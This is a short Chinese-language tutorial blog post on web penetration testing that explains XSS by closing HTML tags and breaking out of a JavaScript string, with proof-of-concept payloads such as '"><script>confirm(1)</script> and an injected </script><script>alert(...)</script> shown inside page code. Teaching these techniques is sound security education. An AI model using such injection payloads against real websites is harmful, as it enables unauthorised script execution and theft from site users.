Web渗透测试之XSS跨站脚本之JS输出 以及 什么是闭合标签 一篇文章给你说明白

目录

闭合标签

XSS之js输出


闭合标签

  • 封闭标签 达到 让标签值不当成 一个属性值来展示 从而达到xss注入的效果

XML 复制代码
'"> 为了想办法闭合前面的标签,不用也行成功率高一些
攻击方法 '"><script>confirm(1)</script>,
  • 其中 '"> 我们称之为完成闭合符号,后面跟script标签来进行攻击,弹出了窗口表示我们的js代码被执行了。

  • 触发JS代码 生成XSS攻击


XSS之js输出

这个方式还是需要采用闭合的方式来进行使用 引号 闭合</script>

XML 复制代码
'</script><script>alert('this is my order')</script>>
复制代码
也就是在页面上输出 输出到js代码页面中去了 在js代码中执行
  • 查看页面源代码在查看js代码执行
  • 把前面的闭合 后面构造自己的js
XML 复制代码
<script>
    $ms=''</script><script>alert('this is my order')</script>>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }

相关推荐
云知谷8 分钟前
【HTML】网络数据是如何渲染成HTML网页页面显示的
开发语言·网络·计算机网络·html
昔人'10 分钟前
css使用 :where() 来简化大型 CSS 选择器列表
前端·css
昔人'12 分钟前
css `dorp-shadow`
前端·css
流***陌20 分钟前
扭蛋机 Roll 福利房小程序前端功能设计:融合趣味互动与福利适配
前端·小程序
Andya_net29 分钟前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
可触的未来,发芽的智生29 分钟前
新奇特:黑猫警长的纳米世界,忆阻器与神经网络的智慧
javascript·人工智能·python·神经网络·架构
烛阴1 小时前
用 Python 揭秘 IP 地址背后的地理位置和信息
前端·python
前端开发爱好者1 小时前
尤雨溪官宣:"新玩具" 比 Prettier 快 45 倍!
前端·javascript·vue.js
why技术1 小时前
从18w到1600w播放量,我的一点思考。
java·前端·后端
欧阳呀1 小时前
Vue+element ui导入组件封装——超级优雅版
前端·javascript·vue.js·elementui